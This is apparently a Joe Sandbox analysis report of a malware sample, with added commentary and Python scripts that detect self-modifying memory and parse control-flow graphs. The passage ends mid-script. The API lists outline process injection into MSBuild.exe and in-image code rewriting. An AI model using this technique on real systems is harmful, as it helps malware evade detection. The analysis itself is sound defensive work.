• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 9b63fcbff6e00e5415b9081d962dbb2e04f544dab12d7099f54cd576d8732cc6
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: 18B1F67260028AAFDB60CF68CC80BDA77A5FF88714F158165EA08AB341D770FE51CB94

Control-flow Graph

APIs
  • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
• CreateFileA.KERNELBASE ref: 002A1BD1
• GetFileSize.KERNEL32(00000000,00000000), ref: 002A1BE1
• ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 002A1C07
• CloseHandle.KERNELBASE(00000000), ref: 002A1C16
• _strlen.LIBCMT ref: 002A1C84
• CloseHandle.KERNEL32(00000000), ref: 002A1E83
• PostQuitMessage.USER32(00000000), ref: 002A1EE0
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: File$CloseHandle_strlen$CreateMessagePostQuitReadSize
• String ID:
• API String ID: 3694359222-0
• Opcode ID: 0ef5f7d573636a6907aa85ce9bd334bea8cfc270a79b4b797320352f2998a39c
                                                                                                                                                                                                                                        • Instruction ID: 9470c7981e5e7a9d749ac393af3d60380e6f350b45d33afe3da5fa82619ad1cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ef5f7d573636a6907aa85ce9bd334bea8cfc270a79b4b797320352f2998a39c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 779127729243119FC314DF24D88962BBBE5FF8A360F15492EF8858B351EB34D964CB92
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f47a35c19b700b03707c330cd3a1779738bf2084adec634af6638c8ad568656a
• Instruction ID: ca96a84f3e2c3afd9d590ec833ef808ec0e996ec79e35ab5d1c12cf7c78a41b3
• Opcode Fuzzy Hash: f47a35c19b700b03707c330cd3a1779738bf2084adec634af6638c8ad568656a
• Instruction Fuzzy Hash: 1E32A17062C7418FC714CF28C49062ABBE2BF86304F148A5DE49A8B3A1DF75ED55CB96

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 002A20E8
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 002A20F9
• GetCurrentThreadId.KERNEL32 ref: 002A214A
  • Part of subcall function 002AD0B6: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 002AD0C2
  • Part of subcall function 002AD0B6: GetExitCodeThread.KERNEL32(?,?), ref: 002AD0DB
  • Part of subcall function 002AD0B6: CloseHandle.KERNEL32(?), ref: 002AD0ED
  • Part of subcall function 002B3E7D: CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 002B3EC6
  • Part of subcall function 002B3E7D: GetLastError.KERNEL32 ref: 002B3ED2
  • Part of subcall function 002B3E7D: __dosmaperr.LIBCMT ref: 002B3ED9
• GetCurrentThreadId.KERNEL32 ref: 002A21AF
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21E9
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21F0
• std::_Throw_Cpp_error.LIBCPMT ref: 002A21F7
• std::_Throw_Cpp_error.LIBCPMT ref: 002A2204
• std::_Throw_Cpp_error.LIBCPMT ref: 002A2213
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFileLastNameObjectSingleWait__dosmaperr
• String ID:
• API String ID: 686914455-0
• Opcode ID: ae48edd374ab79ad16eb93c3fceaa60a0f6bd636d977d491e181b9d30022d8c5
• Instruction ID: eea45fd2a52f8132e43a3e1b5d841638d6e9af652e8e0bbbf5f12d74b7488a77
• Opcode Fuzzy Hash: ae48edd374ab79ad16eb93c3fceaa60a0f6bd636d977d491e181b9d30022d8c5
• Instruction Fuzzy Hash: 1631B3B1A60301BBE720AF659C07B9A77A49F47B40F004419FA4D6A1C5EFB49974CFA3

Control-flow Graph

control_flow_graph 132 2bb8b2-2bb8be 133 2bb950-2bb953 132->133 134 2bb959 133->134 135 2bb8c3-2bb8d4 133->135 136 2bb95b-2bb95f 134->136 137 2bb8e1-2bb8fa LoadLibraryExW 135->137 138 2bb8d6-2bb8d9 135->138 141 2bb8fc-2bb905 GetLastError 137->141 142 2bb960-2bb970 137->142 139 2bb979-2bb97b 138->139 140 2bb8df 138->140 139->136 144 2bb94d 140->144 145 2bb93e-2bb94b 141->145 146 2bb907-2bb919 call 2beeb4 141->146 142->139 143 2bb972-2bb973 FreeLibrary 142->143 143->139 144->133 145->144 146->145 149 2bb91b-2bb92d call 2beeb4 146->149 149->145 152 2bb92f-2bb93c LoadLibraryExW 149->152 152->142 152->145
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,DAA4AEFB,?,002BB9C1,?,?,00000000), ref: 002BB973
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
• Instruction ID: 8bb3f163646e87e1c31abbbed64bc652bf503c40eb1a92d7cd699f6586d42355
• Opcode Fuzzy Hash: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
• Instruction Fuzzy Hash: E2210531E22616BBD7229F21EC85ADA3768DF417F0F250121EA15A72D0D7B0EE10CAE1

Control-flow Graph

control_flow_graph 153 2a14c0-2a1533 call 2b8870 156 2a1542-2a154c 153->156 157 2a1535-2a153f 153->157 158 2a154e-2a1551 156->158 159 2a1556-2a155c 156->159 157->156 161 2a16f6-2a1717 158->161 162 2a155e-2a1560 159->162 163 2a157c-2a1588 159->163 164 2a1719-2a1720 call 2abaae 161->164 165 2a1750-2a1792 call 2a3120 call 2a3190 call 2ae6da 161->165 162->163 166 2a1562-2a1576 call 2a2940 162->166 167 2a158e-2a1598 163->167 168 2a1622-2a1637 call 2ab367 163->168 181 2a1729-2a1734 164->181 182 2a1722-2a1724 call 2a3b30 164->182 166->161 166->163 167->168 172 2a159e-2a15a3 167->172 175 2a163a-2a164f 168->175 177 2a15db-2a15f3 172->177 183 2a16d1-2a16d4 175->183 184 2a1655-2a165f 175->184 178 2a15b0-2a15bc 177->178 179 2a15f5-2a15fc 177->179 194 2a15c2-2a15d9 178->194 200 2a16d6-2a16db 178->200 179->178 186 2a15fe-2a160d 179->186 190 2a173b-2a174f call 2a986f 181->190 191 2a1736 181->191 182->181 185 2a16df-2a16f4 183->185 184->183 189 2a1661-2a1666 184->189 185->161 186->194 196 2a16a1-2a16b5 189->196 191->190 194->177 201 2a160f-2a1620 194->201 198 2a1670-2a167c 196->198 199 2a16b7-2a16be 196->199 198->200 204 2a167e-2a169f 198->204 199->198 203 2a16c0-2a16cf 199->203 200->185 201->168 203->204 204->183 204->196
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: 891af424b06b911049d95731f4c4da951a3f966848a224136274e83b05c694d8
                                                                                                                                                                                                                                        • Instruction ID: 0eceb4cc3ecada8fe636a6e50337c9207a65e9b67d9d53cc1b7245b31d9d2884
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 891af424b06b911049d95731f4c4da951a3f966848a224136274e83b05c694d8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B89191746142008FDB14CF29C494B25B7E6FF8A724F1886ACE9468F3A6DB35EC65CB41

Control-flow Graph

APIs
  • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
• FreeConsole.KERNELBASE(?,?,?,002D4808,ios_base::badbit set), ref: 002A1AE1
• VirtualProtect.KERNELBASE(002D601C,00000549,00000040,?), ref: 002A1B30
• ExitProcess.KERNEL32 ref: 002A1B66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ConsoleExitFreeProcessProtectVirtual_strlen
• String ID: ios_base::badbit set
• API String ID: 4233975149-3882152299
• Opcode ID: d2502d53a253e0d97f845a4d74a84b87fcce3e1ee5bcebcb4b18edd2153036da
• Instruction ID: 12dc254bb3ed72627faf767e310fa0cd1a94a95aac2d7a0129fee9ad0cf9f013
• Opcode Fuzzy Hash: d2502d53a253e0d97f845a4d74a84b87fcce3e1ee5bcebcb4b18edd2153036da
• Instruction Fuzzy Hash: 73014C35F501047BDB007B65AC07FAF7764DB42755F004425FA08B62C2FA75AA308AD4
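The three calls recorded for this function are worth reading together: VirtualProtect(002D601C, 00000549, 00000040) sets 0x549 bytes inside the module's own image (base 002A0000) to 0x40, which is PAGE_EXECUTE_READWRITE, and the only associated dump whose name carries 00000040 is the one based at 002D6000, the region that call targets. That is the footprint of code rewriting part of its own image before continuing. The scanner below is an added example, not part of the Joe Sandbox report: it parses API lines in the report's own format, flags VirtualProtect calls that make part of the image both writable and executable, and correlates each hit with the dump whose base precedes the address. Two assumptions are built in and marked in the code: the image end 0x2DE000 is the last dump address plus one page, an estimate rather than the PE's SizeOfImage, and the fifth dotted field of an .sdmp name is read as the region's page protection, which fits every value listed here but is an inference about the naming scheme.

```python
import re

# Constructed sample input: API lines copied in the format the report prints them.
SAMPLE_API_LINES = [
    "FreeConsole.KERNELBASE(?,?,?,002D4808,ios_base::badbit set), ref: 002A1AE1",
    "VirtualProtect.KERNELBASE(002D601C,00000549,00000040,?), ref: 002A1B30",
    "ExitProcess.KERNEL32 ref: 002A1B66",
    "CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 002B3EC6",
]

# Constructed sample input: the memory-dump names listed for this module.
SAMPLE_DUMP_NAMES = [
    "00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp",
]

IMAGE_BASE = 0x2A0000   # "Offset: 002A0000" in the report
IMAGE_END = 0x2DE000    # assumption: last dump base plus one 4 KiB page, not the real SizeOfImage

# Win32 page-protection constants (winnt.h)
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
WRITABLE_AND_EXECUTABLE = {PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}

# "Api.Module(args), ref: addr" or "Api.Module ref: addr" (no argument list)
API_LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
# assumption: 4th dotted field is the region base, 5th its page protection
DUMP_NAME_RE = re.compile(
    r"^\d{8}\.\d{8}\.\d+\.(?P<addr>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\."
)


def parse_api_line(line):
    """Parse one API line; 8-digit hex arguments become ints, '?' and symbols stay strings."""
    m = API_LINE_RE.match(line.strip())
    if m is None:
        return None
    args = []
    if m.group("args") is not None:
        for raw in m.group("args").split(","):
            raw = raw.strip()
            args.append(int(raw, 16) if HEX32_RE.match(raw) else raw)
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def parse_dump_name(name):
    """Return (region base, page protection) read from an .sdmp file name, or None."""
    m = DUMP_NAME_RE.match(name)
    if m is None:
        return None
    return int(m.group("addr"), 16), int(m.group("prot"), 16)


def flag_rwx_in_image(call, image_base=IMAGE_BASE, image_end=IMAGE_END):
    """Flag VirtualProtect(addr, size, newprot) that makes part of the image writable+executable."""
    if call is None or call["api"] != "VirtualProtect" or len(call["args"]) < 3:
        return None
    addr, size, prot = call["args"][:3]
    if not all(isinstance(v, int) for v in (addr, size, prot)):
        return None  # an unresolved '?' argument: cannot judge this call
    if prot not in WRITABLE_AND_EXECUTABLE or not (image_base <= addr < image_end):
        return None
    return {"ref": call["ref"], "addr": addr, "size": size, "prot": prot, "end": addr + size}


def dump_for_address(addr, dump_names):
    """Pick the dump whose base is the closest one at or below addr."""
    best = None
    for name in dump_names:
        parsed = parse_dump_name(name)
        if parsed and parsed[0] <= addr and (best is None or parsed[0] > best[0]):
            best = parsed
    return best


def scan(api_lines, dump_names):
    """Return W+X VirtualProtect hits, each annotated with the protection seen in the dump."""
    hits = []
    for line in api_lines:
        hit = flag_rwx_in_image(parse_api_line(line))
        if hit is None:
            continue
        dump = dump_for_address(hit["addr"], dump_names)
        hit["dump_base"], hit["dump_prot"] = dump if dump else (None, None)
        hit["dump_agrees"] = dump is not None and dump[1] == hit["prot"]
        hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_API_LINES, SAMPLE_DUMP_NAMES):
        print(f"W+X VirtualProtect at ref {h['ref']:08X}: {h['addr']:08X}-{h['end']:08X} "
              f"prot={h['prot']:#x} dump={h['dump_base']} dump_prot={h['dump_prot']} "
              f"agrees={h['dump_agrees']}")
```

On the lines above this yields a single hit: ref 002A1B30, range 002D601C-002D6565, with the 002D6000 dump already showing protection 0x40, so the dump was taken after the re-protection and the bytes in it are the post-write contents, which is what you want to diff against the on-disk section when looking for the rewritten code.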

Control-flow Graph
• Graph image not reproduced in text; its node list covers basic blocks 2b3e7d-2b3efe with calls to 2b6211, 2b68fc, 2b3f0e, CreateThread, GetLastError, 2b6237 and 2b3f5e (legend: Executed / Not Executed)
APIs
• CreateThread.KERNELBASE(?,?,Function_00013F95,00000000,?,?), ref: 002B3EC6
• GetLastError.KERNEL32 ref: 002B3ED2
• __dosmaperr.LIBCMT ref: 002B3ED9
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: CreateErrorLastThread__dosmaperr
• String ID:
• API String ID: 2744730728-0
• Opcode ID: 12b03d87151fd6d62d1bc69c9b02c7e0eb30c7ee93b2660a79732cc35929a978
• Instruction ID: fc8e06517b940013f30401089b689e49333513fe39fd8b18fb11bca74f1d077c
• Opcode Fuzzy Hash: 12b03d87151fd6d62d1bc69c9b02c7e0eb30c7ee93b2660a79732cc35929a978
• Instruction Fuzzy Hash: C2019E7292021AAFDF15DFA5DC0AAEE3BB5EF40390F004159F80196190EB71CF60DB90

Control-flow Graph
• Graph image not reproduced in text; its node list covers basic blocks 2c2520-2c273b with calls to 2b6aa5, 2c12d0, 2c284d, 2c28ca, 2c2cf9, 2c2c91, 2c2ebd, 2c2dd4, 2b629d, WriteFile and GetLastError (legend: Executed / Not Executed)
APIs
  • Part of subcall function 002C28CA: GetConsoleOutputCP.KERNEL32(DAA4AEFB,00000000,00000000,?), ref: 002C292D
• WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002B7097,?), ref: 002C26A5
• GetLastError.KERNEL32(?,?,002B7097,?,002B72DB,00000000,?,00000000,002B72DB,?,?,?,002D4DE0,0000002C,002B71C7,?), ref: 002C26AF
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• API String ID: 2915228174-0
• Opcode ID: 5525905a634b39bf4b5a7a38772f0a3a26c63dc0017007192fa957bfaf7ddc7b
• Instruction ID: b2de1c04f91b97ede81ef4583b59ca32d41cc08df654d70faaf767de10d60726
• Opcode Fuzzy Hash: 5525905a634b39bf4b5a7a38772f0a3a26c63dc0017007192fa957bfaf7ddc7b
• Instruction Fuzzy Hash: 5961B371D2011AEFDF15CFA8D984FEEBBB9AF09304F140249E804A7251DB71D929DBA0

Control-flow Graph
• Graph image not reproduced in text; its node list covers basic blocks 2c2cf9-2c2dd3 with calls to 2ae300, 2a986f, WriteFile and GetLastError (legend: Executed / Not Executed)
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,002C268B,00000000,002B72DB,?,00000000,?,00000000), ref: 002C2D95
• GetLastError.KERNEL32(?,002C268B,00000000,002B72DB,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,002B7097), ref: 002C2DBB
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
                                                                                                                                                                                                                                        • Opcode ID: 5730c7a63acf52d6a4a6bdbfa713032f6f748404bc788f8ea423e0a350d67f67
                                                                                                                                                                                                                                        • Instruction ID: 8ff20d212fc44725c6927da94eda3bfba852611bead31952646c90b32a49249d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5730c7a63acf52d6a4a6bdbfa713032f6f748404bc788f8ea423e0a350d67f67
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B218030A10219DFCF15CF29DC80EE9B7B9EB59301B1445AEE906D7211DA30DE568F60

Control-flow Graph
Basic blocks (id: address range [API or call target] -> successor ids):
• 313: 2bc3d2-2bc3d7 -> 314
• 314: 2bc3d9-2bc3f1 -> 315, 316
• 315: 2bc3ff-2bc408 -> 318, 319
• 316: 2bc3f3-2bc3f7 -> 315, 317
• 317: 2bc3f9-2bc3fd -> 321
• 318: 2bc41a -> 320
• 319: 2bc40a-2bc40d -> 322, 323
• 320: 2bc41c-2bc429 GetStdHandle -> 324, 325
• 321: 2bc474-2bc478 -> 314, 326
• 322: 2bc40f-2bc414 -> 320
• 323: 2bc416-2bc418 -> 320
• 324: 2bc42b-2bc42d -> 325, 327
• 325: 2bc456-2bc468 -> 321, 328
• 326: 2bc47e-2bc481 (no successors)
• 327: 2bc42f-2bc438 GetFileType -> 325, 329
• 328: 2bc46a-2bc46d -> 321
• 329: 2bc43a-2bc443 -> 330, 331
• 330: 2bc44b-2bc44e -> 321, 332
• 331: 2bc445-2bc449 -> 321
• 332: 2bc450-2bc454 -> 321
APIs
• GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,002BC2C1,002D5160), ref: 002BC41E
• GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,002BC2C1,002D5160), ref: 002BC430
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 8d0ca04e11dffbe5e4f4c14111889cf69b2033b3f49863c57576233a949902b5
• Instruction ID: 2de226d34a3522578537d606a851cc683d5abd5e901cb483cbd95fdc58b8260f
• Opcode Fuzzy Hash: 8d0ca04e11dffbe5e4f4c14111889cf69b2033b3f49863c57576233a949902b5
• Instruction Fuzzy Hash: F3110A715347424AC7308E3E9CA82B27EB4A7563F0B380B6AD0F6D26F2C670CA95D545
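
The control-flow graphs in this report are exported as one flat edge-list string per function: a decimal block id followed by a hex address or address range, an optional annotation (an API name such as GetStdHandle, or "call <addr>" for a subroutine call), and "src->dst" edges. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses that text, finds entry and exit blocks, detects loops through DFS back edges, and reports which API calls sit inside a loop. The token grammar is inferred from the graphs on this page rather than taken from Joe Sandbox documentation, and the two inputs are the graph text of the GetStdHandle/GetFileType function above and of the GetProcAddress function further down, embedded inline.

```python
"""Parse the flat control-flow-graph text a Joe Sandbox report exports and summarise it:
entry/exit blocks, loops, and which API calls sit inside a loop.  Added example; the token
grammar is inferred from the graphs on this page, not from Joe Sandbox documentation:
<id> <start>[-<end>] block (hex addrs); <Name> API; call <addr> subroutine call; <src>-><dst> edge."""
import re
from collections import defaultdict

# Constructed inputs: the edge-list text of two functions from this report, copied inline.
CFG_TEXT = (
    "control_flow_graph 313 2bc3d2-2bc3d7 314 2bc3d9-2bc3f1 313->314 315 2bc3ff-2bc408 314->315 "
    "316 2bc3f3-2bc3f7 314->316 318 2bc41a 315->318 319 2bc40a-2bc40d 315->319 316->315 "
    "317 2bc3f9-2bc3fd 316->317 321 2bc474-2bc478 317->321 320 2bc41c-2bc429 GetStdHandle 318->320 "
    "322 2bc40f-2bc414 319->322 323 2bc416-2bc418 319->323 324 2bc42b-2bc42d 320->324 "
    "325 2bc456-2bc468 320->325 321->314 326 2bc47e-2bc481 321->326 322->320 323->320 324->325 "
    "327 2bc42f-2bc438 GetFileType 324->327 325->321 328 2bc46a-2bc46d 325->328 327->325 "
    "329 2bc43a-2bc443 327->329 328->321 330 2bc44b-2bc44e 329->330 331 2bc445-2bc449 329->331 "
    "330->321 332 2bc450-2bc454 330->332 331->321 332->321"
)
CFG_TEXT_GETPROC = (
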